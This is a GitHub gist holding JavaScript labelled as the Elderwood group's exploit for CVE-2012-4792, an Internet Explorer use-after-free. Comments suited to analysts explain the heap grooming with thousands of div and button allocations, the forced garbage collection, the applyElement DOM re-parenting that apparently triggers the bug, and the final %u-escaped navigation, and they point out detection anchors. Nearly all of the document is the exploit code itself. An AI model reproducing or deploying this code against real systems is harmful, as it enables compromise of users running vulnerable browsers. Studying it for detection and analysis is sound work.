@dguido
Last active December 14, 2015 14:59
Exploit for CVE-2012-4792 as developed by Elderwood
// Archived browser-exploit sample, labelled by the gist as CVE-2012-4792.
// Publicly, that CVE is a use-after-free in Internet Explorer; the calls used
// here (CollectGarbage, applyElement, ms-help://) are IE/Windows specific.
// The script depends on HTML that is not part of this listing: elements with
// ids "a" and "b" must already exist in the hosting document.
// Reading guide for analysts: the statement order is the interesting part.
// Blocks of allocations and releases are interleaved with forced garbage
// collection, then a short DOM re-parenting sequence runs, then the page
// navigates away. Remediation is the vendor fix for the CVE named above.

// Element references used by the DOM sequence further down.
var e0 = null;
var e1 = null;
var e2 = null;
// Two bulk containers: 3000 slots for <div> elements, 500 for <button>s.
var arrObject = new Array(3000);
var elmObject = new Array(500);
// Create 3000 divs, each given the same fixed-length className string.
// The literal contains no %-escapes, so unescape() returns it unchanged.
for (var i = 0; i < arrObject.length; i++) {
arrObject[i] = document.createElement('div');
arrObject[i].className = unescape("ababababababababababababababababababababa");
}
// Drop the className string on every even-indexed div ...
for (var i = 0; i < arrObject.length; i += 2) {
arrObject[i].className = null;
}
// ... and force a collection pass. CollectGarbage() is a JScript-only global;
// its presence in page script is itself a useful hunting signal.
CollectGarbage();
// Allocate 500 button elements after the first round of releases.
for (var i = 0; i < elmObject.length; i ++) {
elmObject[i] = document.createElement( 'button' );
}
// Drop the className string on the remaining (odd-indexed) divs, then collect.
for(var i = 1; i < arrObject.length; i += 2) {
arrObject[i].className = null;
}
CollectGarbage();
// Navigation to the ms-help: protocol handler, with any error swallowed.
// NOTE(review): the listing does not say why; ordinary web content has no
// reason to do this, so it is worth flagging in proxy or script telemetry.
try {location.href = 'ms-help://'} catch(e){}
// DOM re-parenting sequence on the pre-existing elements "a" and "b" plus a
// fresh <q>: applyElement twice, a <button> child appended in between, then
// outerText cleared and a <body> appended to the <q>.
// Presumably this is the step that reaches the vulnerable code path; the page
// does not explain it. All exceptions are silently discarded.
try {
e0 = document.getElementById ("a");
e1 = document.getElementById ("b");
e2 = document.createElement ("q");
e1.applyElement( e2 );
e1.appendChild(document.createElement( 'button' ));
e1.applyElement( e0 );
e2.outerText = "";
e2.appendChild(document.createElement( 'body' ));
}
catch(e)
{
}
CollectGarbage();
// Re-assign the same className string to the first 20 divs, i.e. a small
// burst of same-sized string allocations right after the collection above.
for(var i =0; i < 20; i++) {
arrObject[i].className = unescape("ababababababababababababababababababababa");
}
// Final navigation: the target string is two %u-escaped UTF-16 code units
// followed by an otherwise ordinary https URL. A genuine redirect would not
// carry that prefix, so the pattern (%uXXXX%uXXXX + URL passed through
// unescape into window.location) is a reasonable static detection anchor.
window.location = unescape("%u0d0c%u10abhttps://www.google.com/settings/account");